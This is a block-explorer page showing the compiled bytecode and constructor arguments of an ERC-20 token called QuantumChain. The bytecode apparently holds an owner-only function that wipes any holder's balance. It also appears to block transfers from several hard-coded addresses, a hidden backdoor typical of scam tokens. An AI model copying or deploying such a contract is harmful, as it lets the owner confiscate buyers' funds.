045260246000fd5b6000600282049050600182168061120b57607f821691505b60208210810361121e5761121d6111c4565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061125e82610ff7565b915061126983610ff7565b925082820190508082111561128157611280611224565b5b92915050565b600061129282610ff7565b915061129d83610ff7565b92508282039050818111156112b5576112b4611224565b5b92915050565b6112c481610fb9565b82525050565b60006060820190506112df60008301866112bb565b6112ec60208301856110a3565b6112f960408301846110a3565b949350505050565b600060208201905061131660008301846112bb565b9291505056fea2646970667358221220a08465d2805c8ce50ae8a5050f7e9fcd02ee61352455ef83d245cd3dd4560d0f64736f6c634300081c0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000001f972880000000000000000000000000ecf152babe1a116ae742c2d48835d94793bec004000000000000000000000000000000000000000000000000000000000000000c5175616e74756d436861696e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ae29a9befb88f5154434800000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061009e5760003560e01c80633bf5bce7116100665780633bf5bce71461015d57806370a082311461017957806395d89b41146101a9578063a9059cbb146101c7578063dd62ed3e146101f75761009e565b806306fdde03146100a3578063095ea7b3146100c157806318160ddd146100f157806323b872dd1461010f578063313ce5671461013f575b600080fd5b6100ab610227565b6040516100b89190610f72565b60405180910390f35b6100db60048036038101906100d6919061102d565b6102b9565b6040516100e89190611088565b60405180910390f35b6100f96102dc565b60405161010691906110b2565b60405180910390f35b610129600480360381019061012491906110cd565b6102e6565b6040516101369190611088565b60405180910390f35b610147610315565b604051610154919061113c565b60405180910390f35b61017760048036038101906101729190611157565b61031e565b005b610193600480360381019061018e9190611157565b610490565b6040516101a091906110b2565b60405180910390f35b6101b16104d8565b6040516101be9190610f72565b60405180910390f35b6101e160048036038101906101dc919061102d565b61056a565b6040516101ee9190611088565b60405180910390f35b610211600480360381019061020c9190611184565b61058d565b60405161021e91906110b2565b60405180910390f35b606060038054610236906111f3565b80601f0160208091040260200160405190810160405280929190818152602001828054610262906111f3565b80156102af5780601f10610284576101008083540402835291602001916102af565b820191906000526020600020905b81548152906001019060200180831161029257829003601f168201915b5050505050905090565b6000806102c4610614565b90506102d181858561061c565b600191505092915050565b6000600254905090565b6000806102f1610614565b90506102fe85828561062e565b6103098585856106c3565b60019150509392505050565b60006012905090565b6000808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546000808073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546103aa9190611253565b925050819055506000808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104399190611287565b6000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061048481610a17565b61048d57600080fd5b50565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600480546104e7906111f3565b80601f0160208091040260200160405190810160405280929190818152602001828054610513906111f3565b80156105605780601f1061053557610100808354040283529160200191610560565b820191906000526020600020905b81548152906001019060200180831161054357829003601f168201915b5050505050905090565b600080610575610614565b90506105828185856106c3565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b6106298383836001610a77565b505050565b600061063a848461058d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8110156106bd57818110156106ad578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106a4939291906112ca565b60405180910390fd5b6106bc84848484036000610a77565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107355760006040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161072c9190611301565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107a75760006040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161079e9190611301565b60405180910390fd5b731f2f10d1c40777ae1da742455c65828ff36df38773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361083f57731f2f10d1c40777ae1da742455c65828ff36df3876040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108369190611301565b60405180910390fd5b73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108d75773ae2fc483527b8ef99eb5d9b44875f005ba1fae136040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108ce9190611301565b60405180910390fd5b73c38e00ac5ed8859f18f4e9017fa2b3d3e1f65f4073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361096f5773c38e00ac5ed8859f18f4e9017fa2b3d3e1f65f406040517fec442f050000000000000000000000000000000000000000000000000000000081526004016109669190611301565b60405180910390fd5b7301d37a36220d52108ae6d453fe6cd80af290637673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a07577301d37a36220d52108ae6d453fe6cd80af29063766040517fec442f050000000000000000000000000000000000000000000000000000000081526004016109fe9190611301565b60405180910390fd5b610a12838383610c4e565b505050565b6000610a21610e73565b15610a2f5760019050610a72565b61dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a6d5760009050610a72565b600090505b919050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610ae95760006040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610ae09190611301565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b5b5760006040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610b529190611301565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508015610c48578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610c3f91906110b2565b60405180910390a35b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ca0578060026000828254610c949190611253565b92505081905550610d73565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d2c578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610d23939291906112ca565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dbc5780600260008282540392505081905550610e09565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e6691906110b2565b60405180910390a3505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610eb6610614565b73ffffffffffffffffffffffffffffffffffffffff1603610eda5760019050610edf565b600090505b90565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f1c578082015181840152602081019050610f01565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f4482610ee2565b610f4e8185610eed565b9350610f5e818560208601610efe565b610f6781610f28565b840191505092915050565b60006020820190508181036000830152610f8c8184610f39565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fc482610f99565b9050919050565b610fd481610fb9565b8114610fdf57600080fd5b50565b600081359050610ff181610fcb565b92915050565b6000819050919050565b61100a81610ff7565b811461101557600080fd5b50565b60008135905061102781611001565b92915050565b6000806040838503121561104457611043610f94565b5b600061105285828601610fe2565b925050602061106385828601611018565b9150509250929050565b60008115159050919050565b6110828161106d565b82525050565b600060208201905061109d6000830184611079565b92915050565b6110ac81610ff7565b82525050565b60006020820190506110c760008301846110a3565b92915050565b6000806000606084860312156110e6576110e5610f94565b5b60006110f486828701610fe2565b935050602061110586828701610fe2565b925050604061111686828701611018565b9150509250925092565b600060ff82169050919050565b61113681611120565b82525050565b6000602082019050611151600083018461112d565b92915050565b60006020828403121561116d5761116c610f94565b5b600061117b84828501610fe2565b91505092915050565b6000806040838503121561119b5761119a610f94565b5b60006111a985828601610fe2565b92505060206111ba85828601610fe2565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061120b57607f821691505b60208210810361121e5761121d6111c4565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061125e82610ff7565b915061126983610ff7565b925082820190508082111561128157611280611224565b5b92915050565b600061129282610ff7565b915061129d83610ff7565b92508282039050818111156112b5576112b4611224565b5b92915050565b6112c481610fb9565b82525050565b60006060820190506112df60008301866112bb565b6112ec60208301856110a3565b6112f960408301846110a3565b949350505050565b600060208201905061131660008301846112bb565b9291505056fea2646970667358221220a08465d2805c8ce50ae8a5050f7e9fcd02ee61352455ef83d245cd3dd4560d0f64736f6c634300081c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000001f972880000000000000000000000000ecf152babe1a116ae742c2d48835d94793bec004000000000000000000000000000000000000000000000000000000000000000c5175616e74756d436861696e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ae29a9befb88f5154434800000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): QuantumChain
Arg [1] : symbol_ (string): ⚛️QTCH
Arg [2] : supply_ (uint256): 530000000
Arg [3] : uniswapV2Router02_ (address): 0xeCF152bABe1a116ae742C2d48835D94793bEC004
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000000000000000000000000000000000001f972880
Arg [3] : 000000000000000000000000ecf152babe1a116ae742c2d48835d94793bec004
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [5] : 5175616e74756d436861696e0000000000000000000000000000000000000000
Arg [6] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [7] : e29a9befb88f5154434800000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 34 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.